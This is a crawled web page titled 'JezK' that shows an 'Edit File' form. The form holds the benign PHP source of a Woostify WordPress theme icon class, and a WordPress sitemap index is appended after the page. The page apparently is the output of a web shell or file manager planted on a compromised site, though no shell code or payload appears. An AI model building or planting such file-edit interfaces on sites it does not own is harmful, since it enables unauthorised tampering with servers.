
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: class-woostify-icon.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Woostify Icon Class
 *
 * @package  woostify
 */

defined( &#039;ABSPATH&#039; ) || exit;

if ( ! class_exists( &#039;Woostify_Icon&#039; ) ) {
	/**
	 * Class Woostify_Icon
	 */
	class Woostify_Icon {
		/**
		 * Woostify SVGs.
		 *
		 * @var woostify_svgs
		 */
		private static $woostify_svgs = null;

		/**
		 * Woostify SVGs array.
		 *
		 * @var woostify_svgs_arr
		 */
		private static $woostify_svgs_arr = null;

		/**
		 * Get an SVG Icon
		 *
		 * @param string $icon the icon name.
		 * @param bool   $echo echo icon.
		 */
		public static function fetch_svg_icon( $icon = &#039;&#039;, $echo = true ) {
			$svg_output = &#039;&#039;;

			if ( ! self::$woostify_svgs ) {
				ob_start();
				include_once WOOSTIFY_THEME_DIR . &#039;assets/svg/svgs.json&#039;; // phpcs:ignore WPThemeReview.CoreFunctionality.FileInclude.FileIncludeFound
				self::$woostify_svgs     = json_decode( ob_get_clean(), true );
				self::$woostify_svgs     = apply_filters( &#039;woostify_svg_icons&#039;, self::$woostify_svgs );
				self::$woostify_svgs_arr = self::$woostify_svgs;
			}
			$svg_output .= isset( self::$woostify_svgs[ $icon ] ) ? self::$woostify_svgs[ $icon ] : &#039;&#039;;

			$classes = array(
				&#039;woostify-svg-icon&#039;,
				&#039;icon-&#039; . $icon,
			);

			$output = sprintf(
				&#039;&lt;span class=&quot;%1$s&quot;&gt;%2$s&lt;/span&gt;&#039;,
				implode( &#039; &#039;, $classes ),
				$svg_output
			);

			if ( $echo ) {
				echo apply_filters( &#039;woostify_generate_svg_icon&#039;, $output, $icon ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
			} else {
				return apply_filters( &#039;woostify_generate_svg_icon&#039;, $output, $icon );
			}
		}

		/**
		 * Get all SVG Icon
		 */
		public static function fetch_all_svg_icon() {
			if ( ! self::$woostify_svgs_arr ) {
				ob_start();
				include_once WOOSTIFY_THEME_DIR . &#039;assets/svg/svgs.json&#039;; // phpcs:ignore WPThemeReview.CoreFunctionality.FileInclude.FileIncludeFound
				self::$woostify_svgs_arr = json_decode( ob_get_clean(), true );
				self::$woostify_svgs     = self::$woostify_svgs_arr;
				self::$woostify_svgs_arr = apply_filters( &#039;woostify_svg_icons_arr&#039;, self::$woostify_svgs_arr );
			}

			return self::$woostify_svgs_arr;
		}
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
